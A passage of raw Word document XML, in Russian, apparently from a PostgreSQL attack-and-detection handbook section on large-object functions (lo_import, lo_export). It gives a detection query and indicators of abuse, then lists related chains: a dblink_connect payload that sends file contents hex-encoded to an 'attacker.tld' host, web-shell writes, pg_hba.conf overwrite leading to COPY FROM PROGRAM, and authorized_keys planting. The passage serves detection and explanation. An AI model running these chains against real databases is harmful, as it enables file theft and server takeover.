    </w:p>
    <w:p w14:paraId="39A3F261" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Модель привилегий — см. раздел </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (predefined roles).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619637DF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Как выглядит легитимное использование.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEA4E89" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_import</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_export</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stat_statements</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>application-роли</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — практически всегда атака. Легитимный use case — ETL для бинарных данных (медиа-файлы, документы, экспорт-импорт справочников), только из admin/cron-сессий под выделенной ETL-ролью.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D3C684" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Артефакт в `pg_largeobject_metadata` — главный пост-факт маркер атаки.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Каждый </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_import</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_create</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> создаёт запись </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(lomid, lomowner)</w:t>
      </w:r>
      <w:r>
        <w:t>. Запрос для детекции:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C73B39B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT lomid, lomowner, pg_size_pretty(SUM(octet_length(data)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBE3299" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FROM pg_largeobject_metadata m</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A80A00" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>JOIN pg_largeobject l ON l.loid = m.lomid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D946390" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>WHERE m.lomowner NOT IN (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BC62AF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    SELECT oid FROM pg_roles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56227F1B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    WHERE rolname IN ('etl_user', 'media_importer')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04731D1C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F306222" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GROUP BY lomid, lomowner;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E319D94" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Все LO без owner-приложения — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>остаются мусором</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> после атаки. Очищаются только явным </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_unlink(oid)</w:t>
      </w:r>
      <w:r>
        <w:t>, что атакующий часто забывает (Payload B по умолчанию не очищает) или не имеет привилегий выполнить (требует owner LO или superuser).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2076E779" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Резкий рост числа записей в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_largeobject_metadata</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> за короткий период от одной роли — массовый file-read.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9AC2FC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Любой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_export(_, '/var/www/...')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'/home/...'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'/etc/...'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'/root/...'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'/tmp/...'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — однозначно атака. Легитимный экспорт идёт в выделенные ETL-директории под </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-uid (например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/var/lib/postgresql/etl-export/</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2836EF9A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_import('/proc/...')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_import('/etc/...')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_import('/root/...')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — атака; легитимные импорты идут только из ETL-источников.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E92A74F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   В </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stat_activity</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>query</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, содержащий </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_from_bytea</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>decode(..., 'base64')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — атака; legitimate workflow для бинарных данных использует параметризацию </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_put(oid, 0, $1)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без хардкода контента в SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B295CAA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD4ACDE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Работает на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 14–17</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (механика стабильна с PG 11; до PG 11 — только superuser, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без predefined roles).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F88296" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Managed:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> обе predefined roles (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_server_files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_write_server_files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) структурно недоступны на всех major-провайдерах. На AWS RDS — зарезервированы внутренней инфраструктурой, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не выдаются даже `rds_superuser`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; на Google Cloud SQL — аналогично; на Supabase — только service role при custom-конфигурации. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Атака на managed-PG нереализуема ни в read-, ни в write-варианте</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — даже read требует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_server_files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> так же как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в 3.6.3. Self-hosted (bare-metal, IaaS-VM, Kubernetes с own-managed PG) — единственная среда. Детальный разбор — см. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.9</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B68856" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A992EE6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.6.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как альтернативный read-API: одношаговый, без артефакта в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_largeobject_metadata</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Выбор между 3.6.3 и 3.6.4 для read:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> если есть </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_server_files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> проще и чище (3.6.3 Payload A/B), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_import</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> имеет смысл только если планируется последующий </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_export</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (read + write в одной цепочке) или если атакующий хочет сохранить файл в БД как промежуточное состояние для последующего экспорта.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A8F75D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.6.1, 3.6.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — chain для эксфильтрации </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_get</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> результата через OOB-канал, когда HTTP-ответ невидим: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dblink_connect('host=' || encode(lo_get(lo_import(...)), 'hex') || '.attacker.tld ...')</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A265B0A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.x RCE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — chain: (а) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_export</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> web-shell + HTTP-запрос к веб-серверу с тем же uid; (б) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_export</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_hba.conf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_reload_conf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → trust-auth → новый коннект superuser-ом → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>COPY FROM PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; (в) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_export</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>authorized_keys</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + SSH → host-level pivot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7F6793" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.x</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — privilege escalation: пути получения </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_server_files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и особенно редкого </w:t>
      </w:r>
      <w:r>
        <w:rPr>
